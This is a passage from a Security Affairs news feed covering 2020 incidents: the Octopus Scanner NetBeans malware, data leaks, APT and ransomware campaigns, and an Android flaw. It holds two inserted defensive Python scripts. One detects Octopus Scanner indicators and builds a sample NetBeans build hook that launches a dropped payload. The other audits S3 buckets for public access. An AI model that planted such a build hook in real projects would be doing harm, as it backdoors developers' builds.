  1. It makes sure that every time a project was built, any resulting JAR files got infected with a so-called dropper. A dropper is a mechanism that “drops” something to the filesystem to execute. When executed, the dropper payload ensured local system persistence and would subsequently spawn a Remote Administration Tool (RAT), which connects to a set of C2 servers.
  2. It tries to prevent any NEW project builds from replacing the infected one, to ensure that its malicious build artifacts remained in place.”

The ultimate goal of the campaign is to deliver the RAT on the machines of developers working on sensitive projects to steal sensitive information.

“It was interesting that this malware attacked the NetBeans build process specifically since it is not the most common Java IDE in use today,” GitHub concludes.

“If malware developers took the time to implement this malware specifically for NetBeans, it means that it could either be a targeted attack, or they may already have implemented the malware for build systems such as Make, MsBuild, Gradle and others as well and it may be spreading unnoticed,”

“While infecting build processes is certainly not a new idea, seeing it actively deployed and used in the wild is certainly a disturbing trend.”
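A defender can check a developer workstation for the two on-disk signals listed above: a payload at nbproject/cache.dat and a build-impl.xml that has been edited to run it. The script below is an added example, not GitHub's or NetBeans' code; because the post does not give the exact edit the malware makes to build-impl.xml, flagging any XML element that mentions cache.dat is an assumption, and the sample project tree it builds is constructed.

```python
"""Scan NetBeans projects for the Octopus Scanner footprint described above.

Added example, not GitHub's or NetBeans' code. For every NetBeans project
(a directory containing nbproject/) it reports two indicators taken from
the write-up: the dropped payload nbproject/cache.dat, and any reference to
that file inside nbproject/build-impl.xml (assumption: a generated
build-impl.xml never mentions cache.dat, so any mention is suspicious).
"""
import os
import tempfile
import xml.etree.ElementTree as ET

PAYLOAD_NAME = "cache.dat"


def _xml_mentions_payload(path):
    """Return the tags of elements whose attributes or text mention the
    payload file name; a file that fails to parse is reported as such."""
    try:
        root = ET.parse(path).getroot()
    except (ET.ParseError, OSError):
        return ["<unparseable>"]
    tags = []
    for el in root.iter():
        blob = " ".join(el.attrib.values()) + " " + (el.text or "")
        if PAYLOAD_NAME in blob:
            tags.append(el.tag.split("}")[-1])  # drop any XML namespace
    return tags


def scan_netbeans_projects(base_dir):
    """Return {project_dir: {"cache_dat": bool, "build_impl_hits": [tags]}}
    for every project under base_dir showing at least one indicator."""
    findings = {}
    for dirpath, dirnames, _files in os.walk(base_dir):
        if "nbproject" not in dirnames:
            continue
        nb = os.path.join(dirpath, "nbproject")
        has_payload = os.path.isfile(os.path.join(nb, PAYLOAD_NAME))
        build_impl = os.path.join(nb, "build-impl.xml")
        hits = _xml_mentions_payload(build_impl) if os.path.isfile(build_impl) else []
        if has_payload or hits:
            findings[dirpath] = {"cache_dat": has_payload, "build_impl_hits": hits}
    return findings


def build_sample_tree():
    """Create a constructed workspace with one clean project and one that
    shows both indicators. Returns (workspace, clean_project, bad_project)."""
    ws = tempfile.mkdtemp(prefix="nb_ws_")
    clean = os.path.join(ws, "CleanApp")
    bad = os.path.join(ws, "BackdooredApp")
    for proj in (clean, bad):
        os.makedirs(os.path.join(proj, "nbproject"))
    clean_xml = ('<?xml version="1.0"?><project name="CleanApp" basedir="..">'
                 '<target name="-post-jar"/></project>')
    # Constructed: a -post-jar hook that launches the dropped payload.
    bad_xml = ('<?xml version="1.0"?><project name="BackdooredApp" basedir="..">'
               '<target name="-post-jar"><java jar="nbproject/cache.dat" fork="true"/>'
               '</target></project>')
    with open(os.path.join(clean, "nbproject", "build-impl.xml"), "w") as f:
        f.write(clean_xml)
    with open(os.path.join(bad, "nbproject", "build-impl.xml"), "w") as f:
        f.write(bad_xml)
    with open(os.path.join(bad, "nbproject", PAYLOAD_NAME), "wb") as f:
        f.write(b"\x00constructed-placeholder-payload\x00")
    return ws, clean, bad


if __name__ == "__main__":
    workspace, _, _ = build_sample_tree()
    for project, info in scan_netbeans_projects(workspace).items():
        print(project, info)
```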

Pierluigi Paganini

(SecurityAffairs – NetBeans, hacking)

The post Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub appeared first on Security Affairs.

An archive with 20 Million Taiwanese’ citizens leaked in the dark web

Security experts from Cyble discovered in the dark web a database containing details of over 20 Million Taiwanese citizens.

A few weeks ago, threat intelligence firm Cyble discovered in the dark web a database containing details of over 20 Million Taiwanese citizens.

According to the experts, the leak includes government data of an entire country; it was leaked online by a reputable actor that goes online with the moniker “Toogod”.

“A few weeks ago, our researchers came across a leaked database on the darkweb where a known and reputable actor “Toogod” dropped the database of “Taiwan Whole Country Home Registry DB” comprising of 20 Million+ records.” reads a post published by Cyble.

The database size is 3.5 GB, exposed data includes full name, full address, ID, gender, date of birth, and other info.


The seller claims the database dates back to 2019, but Cyble researchers noted that the last DOB record was from 2008. The database contains certain records with ‘NULL/empty’ DoB values, making it impossible to determine how recent the dump is.

Experts are still investigating the leak and will provide an update as soon as possible.

Cyble researchers have acquired the leak and will soon add its data to their AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – Taiwanese database, dark web)

The post An archive with 20 Million Taiwanese’ citizens leaked in the dark web appeared first on Security Affairs.

Steganography in targeted attacks on industrial enterprises in Japan and Europe

Threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks, Kaspersky reported.

Researchers from Kaspersky’s ICS CERT unit reported that threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks.

The experts first observed the attacks in early 2020, while in early May, threat actors targeted organizations in Japan, Italy, Germany and the UK.

Hackers targeted suppliers of equipment and software for industrial enterprises with spear-phishing messages using malicious Microsoft Office documents. Attackers used PowerShell scripts, as well as various techniques to evade detection and hinder analysis of the malware.

“Phishing emails, used as the initial attack vector, were tailored and customized under the specific language for each specific victim. The malware used in this attack performed destructive activity only if the operating system had a localization that matched the language used in the phishing email.” reads the report published by Kaspersky. “For example, in the case of an attack on a company from Japan, the text of a phishing email and a Microsoft Office document containing a malicious macro were written in Japanese.”

The phishing messages are crafted to trick victims into opening the attached document and enable the macros. The emails are written in the target’s language, and the malware only starts if the operating system language on the machine matches the language in the phishing email.

Hackers used the Mimikatz tool to steal the authentication data of Windows accounts stored on a compromised system. At this time, the final goal of the threat actors is still unknown.

Kaspersky experts only observed malicious activity on IT systems; OT networks were not impacted in the attacks.

Upon executing the macro script contained in the bait document, a PowerShell script is decrypted and executed. This script downloads an image from image hosting services such as Imgur or imgbox; experts noticed that the URL of the image is randomly selected from a list.

The image contains data that is extracted by the malware to create another PowerShell script, which in turn creates yet another PowerShell script that is an obfuscated version of the Mimikatz post-exploitation tool.

“The data is hidden in the image using steganographic techniques and is extracted by the malware from pixels defined by the algorithm. Using steganography enables the attackers to evade some security tools, including network traffic scanners.” continues the analysis.

“The data extracted from the image is consecutively encoded using the Base64 algorithm, encrypted with the RSA algorithm and encoded using Base64 again. Curiously, the script has an error in its code, included on purpose, with the exception message used as the decryption key.”

Attackers also used an exception message as the decryption key for a malicious payload; in this case too, the technique aims at evading detection.

Kaspersky confirmed that its solutions have blocked all the attacks it has detected.

“This attack has caught the attention of researchers because the attackers use several unconventional technical solutions.” concludes Kaspersky.

“The use of the above techniques, combined with the pinpoint nature of the infections, indicates that these were targeted attacks. It is a matter of concern that attack victims include contractors of industrial enterprises. If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.”

Pierluigi Paganini

(SecurityAffairs – industrial supplier attack, hacking)

The post Steganography in targeted attacks on industrial enterprises in Japan and Europe appeared first on Security Affairs.

Security breach impacted Cisco VIRL-PE infrastructure

Cisco disclosed a security breach that impacted its VIRL-PE infrastructure: threat actors exploited SaltStack vulnerabilities to hack six company servers.

Cisco has disclosed a security incident that impacted part of its VIRL-PE infrastructure, threat actors exploited vulnerabilities in the SaltStack software package to breach six company servers.

These issues affect the following Cisco products running a vulnerable software release:

  • Cisco Modeling Labs Corporate Edition (CML)
  • Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)

Cisco’s advisory states that the SaltStack software package is bundled with some Cisco products, hackers exploited SaltStack issues to compromise six company servers:

  • us-1.virl.info
  • us-2.virl.info
  • us-3.virl.info
  • us-4.virl.info
  • vsm-us-1.virl.info
  • vsm-us-2.virl.info

“Cisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE. Those servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised. The servers were remediated on May 7, 2020.” reads the advisory.

The six servers are part of the backend infrastructure for VIRL-PE (Internet Routing Lab Personal Edition), a service that allows Cisco users to model and simulate their virtual network environment.

Cisco fixed and remediated all breached VIRL-PE servers on May 7, when it upgraded them by applying the patches for the SaltStack software.

Cisco also confirmed that the Cisco Modeling Labs Corporate Edition (CML), a network modeling tool, is affected by the issues.

At the end of April, researchers from F-Secure disclosed a number of vulnerabilities in the “Salt” framework, including two issues that could be exploited by attackers to take over Salt installations.

The two flaws, tracked as CVE-2020-11651 and CVE-2020-11652, are a directory traversal issue and an authentication bypass vulnerability respectively. Chaining the issues, an attacker could bypass authentication and run arbitrary code on Salt master servers exposed online.

Immediately after the public disclosure of the issues, administrators of Salt servers started reporting attacks exploiting the above vulnerabilities last week; threat actors used them to deliver backdoors and miners.

Shortly after the disclosure of the flaws, threat actors exploited them in several attacks against organizations, including mobile operating system vendor LineageOS, Digicert CA, blogging platform Ghost, cloud software provider Xen Orchestra, and search provider Algolia.

Pierluigi Paganini

(SecurityAffairs – Cisco VIRL-PE infrastructure, hacking)

The post Security breach impacted Cisco VIRL-PE infrastructure appeared first on Security Affairs.

Google TAG report Q1 details about nation-state hacking and disinformation

Google Threat Analysis Group (TAG) has published today its first TAG quarterly report that analyzes rising trends in nation-state and financially motivated attacks.

Google also discloses seven coordinated political influence campaigns that took place on its platforms during Q1 2020.

The Google Threat Analysis Group (TAG) is a group inside Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, which provides insights into the campaigns monitored in the first quarter of 2020.

The report includes recent findings on government-backed phishing, threats, and disinformation campaigns, as well as information about actions the tech giant has taken against accounts involved in coordinated influence campaigns.

A first worrying trend reported by Google is the rise of hack-for-hire companies currently operating out of India.

Another trend was the rising number of political influence campaigns carried out by nation-state actors worldwide.

Experts confirm that threat actors continue to use COVID-19 lures; the pandemic has taken center stage in the world of government-backed hacking. Google continues to uncover COVID-19 themed attacks; groups like the Iran-linked Charming Kitten focus on medical and healthcare professionals, including World Health Organization (WHO) employees.

Experts reported new activity from “hack-for-hire” firms, many based in India, that are using Gmail accounts spoofing the WHO to target business leaders in financial services, consulting, and healthcare corporations within numerous countries, including the U.S., Slovenia, Canada, India, Bahrain, Cyprus, and the UK.

The lures are designed to trick victims into signing up for direct notifications from the WHO to stay informed of COVID-19 related announcements, and link to websites under the control of the attackers that clone the official WHO website. 

“We’ve seen new activity from “hack-for-hire” firms, many based in India, that have been creating Gmail accounts spoofing the WHO,” said Shane Huntley, head of Google TAG.

“The accounts have largely targeted business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the US, Slovenia, Canada, India, Bahrain, Cyprus, and the UK.”


While there have been many hack-for-hire companies around the world, most are located in the EU, Israel, and some Arab countries.

This is the first time that a report references the activity of hack-for-hire Indian companies.

The Google TAG also investigated groups that have also engaged in coordinated social and political influence campaigns.

The TAG team tracked a total of seven influence operations in Q1 2020.

In January Google terminated three YouTube channels as part of a coordinated influence operation linked to Iranian state-sponsored International Union of Virtual Media (IUVM) news organization.

In February, the company terminated one advertising account and 82 YouTube channels that were employed in a coordinated influence operation linked to Egypt.

The campaign was sharing political content in Arabic that was supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and was critical of Iran and Qatar. The campaign was tied to the digital marketing firm New Waves, based in Cairo.

In March, TAG terminated five different influence operations.

  • Three advertising accounts, one AdSense account, and 11 YouTube channels part of a coordinated influence operation linked to India sharing pro-Qatar messages.
  • Google banned one Play Store developer and terminated 68 YouTube channels as part of a coordinated influence operation sharing political content in Arabic supportive of Turkey and critical of the UAE and Yemen.
  • Google also terminated one advertising account, one AdSense account, 17 YouTube channels, and banned one Play developer involved in a coordinated influence operation linked to Egypt, supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and critical of Iran and Qatar.
  • Google also banned one Play developer and terminated 78 YouTube channels used in a coordinated influence operation linked to Serbia.
  • Google also shut down 18 YouTube channels that were part of a coordinated influence operation linked to Indonesia.

“Since March, we’ve removed more than a thousand YouTube channels that we believe to be part of a large campaign and that were behaving in a coordinated manner. These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report. We’ll also share additional removal actions from April and May in the Q2 Bulletin.” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Google TAG, nation-state acting)

The post Google TAG report Q1 details about nation-state hacking and disinformation appeared first on Security Affairs.

Ke3chang hacking group adds new Ketrum malware to its arsenal

The Ke3chang hacking group added a new malware dubbed Ketrum to its arsenal, it borrows portions of code and features from older backdoors.

The Ke3chang hacking group (aka APT15, Vixen Panda, Playful Dragon, and Royal APT) has developed new malware dubbed Ketrum by borrowing parts of the source code and features from their older Ketrican and Okrum backdoors.

“In mid May, we identified three recently uploaded samples from VirusTotal that share code with older APT15 implants. We named this new family of samples, “Ketrum”, due to the merger of features in the documented backdoor families “Ketrican” and “Okrum”.” reads the report published by the security firm Intezer.

“We believe the operation was conducted very recently.”

Back in 2013, security researchers at FireEye spotted a group of China-linked hackers that conducted an espionage campaign against foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang’; the threat actors behind the attacks were later spotted targeting personnel at Indian embassies across the world.

In May 2016, researchers from Palo Alto found evidence that the threat actors behind the Operation Ke3chang had been active since at least 2010.

The cyber-espionage group is believed to be operating out of China, it also targeted military and oil industry entities, government contractors and European diplomatic missions and organizations.

Intezer researchers recently discovered three Ketrum backdoor samples that were uploaded to the VirusTotal platform, they noticed the samples reused part of the source code and features from Ke3chang’s Ketrican and Okrum backdoors.

“Both Ketrum samples resemble a similar layout to previous Ke3chang tools, apart from low-level implementation and use of system APIs,” continues the analysis. “Even in the two Ketrum samples, there are differences between the low-level APIs used to achieve the same functionality.”

The three Ketrum samples connected to the same China-based command and control server and were used in two different time periods.

The command and control (C2) server was shut down during mid-May after the Ketrum samples were spotted.

Below are the differences between the backdoors:

| Feature | Ketrican | Okrum | Ketrum1 | Ketrum2 |
|---|---|---|---|---|
| Identify installed proxy servers and use them for HTTP requests | ❌ | ✅ | ✅ | ✅ |
| Special folder retrieval using registry key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] | ✅ | ❌ | ✅ | ✅ |
| The response from the server is an HTTP page with backdoor commands and arguments included in the HTML fields | ✅ | ❌ | ❌ | ✅ |
| Backdoor commands are determined by a hashing value received from C2 | ❌ | ✅ | ❌ | ❌ |
| Communication with the C&C server is hidden in the Cookie and Set-Cookie headers of HTTP requests | ❌ | ✅ | ✅ | ❌ |
| Impersonate a logged in user’s security context | ❌ | ✅ | ✅ | ❌ |
| Create a copy of cmd.exe in their working directory and use it to interpret backdoor commands | ✅ | ❌ | ✅ | ❌ |
| Usual Ke3chang backdoor functionalities – download, upload, execute files/shell commands and configure sleep time | ✅ | ✅ | ✅ | ✅ |
| Screenshot-grabbing functionality | ❌ | ❌ | ✅ | ❌ |

The Ketrum 1 sample was uploaded to VirusTotal in December 2019 and has a fake January 7, 2010 timestamp. It implements many features from Okrum but abandons the more advanced Okrum features.

The newer Ketrum 2 seems to have been built for minimalism; it drops most of the useless features of the Ke3chang backdoors.

“Unlike the Ketrican variant, Ketrum implants no longer try to weaken the system’s security configurations. In previous implants, Powershell was used for this end.” states the report.

“The group continues to morph its code and switch basic functionalities in their various backdoors. This strategy has been working for the group for years and there is no indication yet that it will deviate from this modus operandi.”

Intezer’s report includes Indicators of Compromise (IoCs) and additional details regarding the new Ketrum malware.

Pierluigi Paganini

(SecurityAffairs – Ke3chang, hacking)

The post Ke3chang hacking group adds new Ketrum malware to its arsenal appeared first on Security Affairs.

Microsoft warns about ongoing PonyFinal ransomware attacks

Microsoft is warning organizations to deploy protections against a new strain of PonyFinal ransomware that has been in the wild over the past two months.

Microsoft’s security team issued a series of tweets warning organizations to deploy protections against a new piece of ransomware dubbed PonyFinal that has been in the wild over the past two months.

PonyFinal is Java-based ransomware that is manually distributed by threat actors. The ransomware first appeared in the threat landscape earlier this year and was involved in highly targeted attacks against selected targets, mainly in India, Iran, and the US.

Human-operated ransomware is a technique usually employed in nation-state attacks that is becoming very popular in the cybercrime ecosystem.

In a human-operated ransomware attack scenario, attackers use stolen credentials, exploit misconfigurations and vulnerabilities to access target networks, attempt to escalate privileges and move laterally, and deliver malware and exfiltrate data.

The most infamous human-operated ransomware campaigns include Sodinokibi, Samas, Bitpaymer, and Ryuk.

PonyFinal operators initially target organizations’ systems management server via brute force attacks, then they deploy a VBScript to run a PowerShell reverse shell to perform data dumps. Threat actors also use a remote manipulator system to bypass event logging.

Once the PonyFinal attackers gained access to the target’s network, they will move laterally to infect other systems with the ransomware.

In many cases, attackers targeted workstations running the Java Runtime Environment (JRE) because PonyFinal is written in Java, but in some attacks the gang installed the JRE on systems before deploying the ransomware.

The PonyFinal ransomware usually adds the “.enc” extension to the names of the encrypted files, it drops a ransom note (named README_files.txt) on the infected systems. The ransom note contains the payment instructions.

Experts pointed out that the encryption scheme of the PonyFinal ransomware is secure and there is no way at this time to recover encrypted files.

Unfortunately, PonyFinal is one of several human-operated ransomware families employed in attacks aimed at the healthcare sector during the COVID-19 pandemic.

Other threats are NetWalker, Maze, REvil, RagnarLocker, and LockBit.

Pierluigi Paganini

(SecurityAffairs – Ponyfinal ransomware, hacking)

The post Microsoft warns about ongoing PonyFinal ransomware attacks appeared first on Security Affairs.

Real estate app leaking thousands of user records and sensitive private messages


The CyberNews research team uncovered an unsecured Amazon Simple Storage Service bucket of confidential user chat logs belonging to the real estate app Tellus, a US-based software company.

Tellus is a software company based in Palo Alto, California, backed by “well-known investors” that aims to “reimagine Real Estate for the modern era.” The company’s app portfolio includes the Tellus App, a real estate loan, management and investing program. Its target users are American landlords and tenants who can receive and pay rent money, as well as keep all of their ownership and rent related data like rental listings, personal information, and correspondence between tenants and landlords in one place.

The data bucket in question contains a folder with 6,729 CSV files related to the Tellus app that include the app’s user records, chat logs, and transaction records left on a publicly accessible Amazon storage server.

How we found the Tellus app bucket

We discovered the exposed data by scanning through open Amazon Simple Storage Service (S3) buckets, which are online servers that can be used to store data for websites, apps, archives, IoT devices, and more.

Amazon S3 buckets are also known for being challenging to secure, leaving many servers unprotected – and often in the news.

We identified Tellus as the owner of the database and notified the company about the leak. As of May 15, the data bucket security issue has been fixed by the Tellus security team and the data is no longer accessible. 
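The bucket described here was readable without any authentication; the two settings that produce that state are the bucket ACL and the bucket policy. The checker below is an added example, not CyberNews' or Tellus' code; it works on dictionaries shaped like what boto3's get_bucket_acl() and get_bucket_policy() return, with constructed sample inputs so no AWS call is made.

```python
"""Audit an S3 bucket's ACL and policy for public access.

Added example, not CyberNews' or Tellus' code. Two mechanisms make a
bucket world-readable: ACL grants to the AllUsers / AuthenticatedUsers
groups, and bucket-policy Allow statements with a wildcard Principal and
no restricting Condition. Inputs mirror boto3's get_bucket_acl() and
get_bucket_policy() output; the sample documents are constructed.
"""
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return (group, permission) pairs granted to the public groups."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            found.append((PUBLIC_GROUPS[grantee["URI"]], grant.get("Permission")))
    return found


def _principal_is_wildcard(principal):
    """True for Principal "*" or {"AWS": "*"} / {"AWS": [..., "*"]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def public_policy_statements(policy_json):
    """Return Sids (or statement[i]) of Allow statements open to anyone."""
    policy = json.loads(policy_json) if isinstance(policy_json, str) else policy_json
    stmts = policy.get("Statement", [])
    stmts = [stmts] if isinstance(stmts, dict) else stmts
    open_sids = []
    for i, st in enumerate(stmts):
        if st.get("Effect") != "Allow" or not _principal_is_wildcard(st.get("Principal")):
            continue
        # A Condition (e.g. on aws:SourceVpce or aws:SourceIp) scopes the
        # grant; only an unconditioned wildcard grant is treated as public.
        if st.get("Condition"):
            continue
        open_sids.append(st.get("Sid", f"statement[{i}]"))
    return open_sids


def is_bucket_public(acl, policy_json):
    """A bucket is public if either mechanism opens it."""
    return bool(public_acl_grants(acl)) or bool(public_policy_statements(policy_json))


# Constructed samples: an open ACL (READ for AllUsers) and an owner-only ACL.
OPEN_ACL = {
    "Owner": {"ID": "exampleownerid"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "exampleownerid"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
LOCKED_ACL = {"Owner": {"ID": "exampleownerid"}, "Grants": [OPEN_ACL["Grants"][0]]}

# Constructed policies: an anonymous-read grant, and the same grant scoped
# to a VPC endpoint by a Condition (placeholder endpoint id).
OPEN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}],
})
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*",
                   "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-PLACEHOLDER"}}}],
})

if __name__ == "__main__":
    print("open ACL + open policy:", is_bucket_public(OPEN_ACL, OPEN_POLICY))
    print("locked ACL + scoped policy:", is_bucket_public(LOCKED_ACL, SCOPED_POLICY))
```

Account-level S3 Block Public Access overrides both mechanisms when enabled; this check audits what the ACL and policy themselves would permit.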

What’s in the data bucket?

The unsecured and unencrypted Amazon S3 bucket contains, among other things:

  • 16,861 user records, including 3,194 verified property owner records and 1,294 verified tenant records stored in separate files
  • Chat logs of private messages between thousands of Tellus platform users, including landlords, tenants, building managers, investors, and Tellus support staff between early 2018 and January 2020
  • Tens of thousands of timestamped property owner transaction records
  • Detailed tenant lead and payment records, including transaction metadata

All of this data is conveniently stored in spreadsheet format that can be easily opened, read, and downloaded by anyone who knows what to look for.

The exposed user records contain:

  • Full names of users, including verified tenants and property owners
  • Traceable user IDs used in transaction records and other logs
  • Email addresses
  • Phone numbers

Example of leaked user records:

The private messages in the chat logs and tenant lead files contain not only the texts of the conversations themselves, but also deeply sensitive content attached therein, including:

  • Full names of the parties involved in the conversation
  • Rent amounts and dates when they are due
  • Tenants’ rented home addresses
  • Case charges and court dates
  • Tenant document scans
  • Screenshots of sensitive images, including other conversations on social media

Example of leaked private messages:

Example of leaked tenant lead messages:


Example of leaked transaction records:


This means that, in the worst-case scenario, leaving the Tellus S3 bucket unsecured and unencrypted might have led to the continued exposure of data belonging to the entire Tellus user base over a period of up to two years, from 2018 to 2020.

Who had access?

The exposed data was hosted on an Amazon Simple Storage Service (S3) server and located in the US. It is currently unknown for how long the data was left unprotected, and we assume that anyone who knew what to look for could have accessed the data bucket without needing any kind of authentication during the unspecified exposure period.

With that said, it is unclear if any malicious actors have accessed the unsecured data bucket until it was closed by Tellus.

What’s the impact?

While numbers-wise this might not appear like a major leak, the impact on the nearly 17,000 Americans whose records were exposed could be significant if certain data was made publicly available.

Here’s how attackers might use the information found in the Tellus S3 bucket against the exposed users:

  • Blackmailing both tenants and landlords by threatening to publicize the sensitive content found in their private messages and transaction logs
  • Using the information found in private messages to mount targeted phishing attacks, hack online bank accounts, and engage in identity theft
  • Spamming emails and phones
  • Brute-forcing the passwords of the email addresses 
  • Brute-forcing the passwords of the Tellus accounts and stealing the funds therein

Original post available on Cybernews:

https://cybernews.com/security/real-estate-app-leaking-thousands-of-user-records-and-sensitive-private-messages/

About the author Edvardas Mikalauskas

Edvardas Mikalauskas is a writer for CyberNews.com. Ed’s interests include all things tech and cybersecurity. You can reach him via email or find him on Twitter giggling at jokes posted by parody accounts.

Pierluigi Paganini

(SecurityAffairs – Real estate app leaking, hacking)

The post Real estate app leaking thousands of user records and sensitive private messages appeared first on Security Affairs.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign uses messages that pretend to be sent by the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team (CERT) from the AgID Agency released an advisory about this threat.

Attackers attempt to take advantage of the interest in the contact tracing app Immuni, which was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT, who shared samples with the malware research community.

The email messages used as a lure are written in Italian and inform citizens of the release of a beta version of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against the COVID-19 outbreak.

To trick victims into downloading the malicious app, threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (FOFI.it).

The attackers registered the “fofl.it” domain (a lowercase L in place of the i of fofi.it) to trick victims.

The content of the email includes download links and contact information that combines email addresses from the attacker and FOFI.

Upon execution, the malware displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background, FuckUnicorn starts encrypting data on the system. It encrypts the files in certain paths (/Desktop, /Links, /Contacts, /Documents, /Downloads, /Pictures, /Music, /OneDrive, /Saved Games, /Favorites, /Searches, and /Videos) that have these extensions:

.Txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas, .db, .torrent

The malicious code appends the “.fuckunicornhtrhrtjrjy” extension to the names of encrypted files.

FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300 worth of Bitcoin within three days, or the data will be lost.

The email address in the ransom note is invalid, making it impossible to send the attacker the payment proof.

At the time of writing, there are no transactions recorded for the wallet included in the ransom note.

The good news for the victims is that CERT-AgID discovered that the password used to encrypt the files is sent in clear text to the attacker, which means it can be recovered from the network traffic.

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

Boris Johnson to reduce Huawei’s role in national 5G network

UK Government will reduce the presence of the equipment manufactured by Chinese Huawei in its 5G network in the wake of the coronavirus outbreak.

UK Government will reduce the presence of the equipment manufactured by the Chinese tech firm Huawei in its 5G network in the wake of the Coronavirus outbreak.

Early this year, the UK Government agreed on the involvement of Huawei in the national 5G network, while the United States expressed its disappointment with Johnson’s decision and threatened to limit intelligence sharing with its ally.

“The Prime Minister plans to reduce Huawei’s involvement in Britain’s 5G network in the wake of the coronavirus outbreak, the Telegraph has learned.” reported The Telegraph.

“Boris Johnson has instructed officials to draw up plans that would see China’s involvement in the UK’s infrastructure scaled down to zero by 2023.”

Prime Minister Boris Johnson has tasked officials with drafting plans that would see the involvement of Chinese firms in Britain’s infrastructure end by 2023.

Next month Mr Johnson will visit the US to participate in the G7 summit, where he aims to confirm that the UK has reduced its dependency on Chinese provisioning of 5G network equipment, a circumstance that could boost trade talks with US President Donald Trump.

In January, the EU’s executive Commission presented a set of rules and technical measures aimed at reducing cybersecurity risks from the adoption of 5G. The Commission’s recommendations included blocking high-risk equipment suppliers from “critical and sensitive” components of 5G infrastructures, such as the core.

The EU’s executive Commission did not explicitly mention companies, but a clear reference is to the Chinese firm Huawei.

In January, the British Government also agreed to assign a limited role for Huawei in the country’s 5G network, but highlighted that “high-risk vendors” would be excluded from the building of “sensitive” core infrastructure.

The US Government continues to push hard for countries to ban Chinese companies from building their next-generation 5G networks, claiming Chinese equipment can be exploited by the Chinese government for cyber espionage.

Many MPs in Johnson’s party do not agree with the involvement of Huawei in building the 5G network.

“He has taken a great many soundings from his own MPs on this issue and shares their serious concerns. The deal was struck before the pandemic hit but coronavirus has changed everything,” an unnamed source told The Telegraph.

Pierluigi Paganini

(SecurityAffairs – 5G, hacking)

StrandHogg 2.0 Android flaw affects over 1 Billion devices

Researchers disclosed a new critical vulnerability (CVE-2020-0096, aka StrandHogg 2.0) affecting the Android operating system that could allow attackers to carry out a sophisticated version of Strandhogg attack.

A group of Norwegian researchers disclosed a critical flaw, tracked as CVE-2020-0096, affecting Android OS that could allow attackers to carry out a sophisticated version of the Strandhogg attack.

In December, security experts at Promon disclosed a vulnerability, dubbed StrandHogg, that has been exploited by tens of malicious Android apps.

The name StrandHogg comes from an old Norse term that refers to a tactic adopted by the Vikings that consists of raiding coastal areas to plunder and hold people for ransom.

The vulnerability resides in Android’s multitasking system and could be exploited by a rogue application installed on the device to pose as a legitimate application in an attempt to harvest elevated permissions from the victim.


A rogue Android app could use the StrandHogg tactic to trick the user into granting it the permissions to control the device.

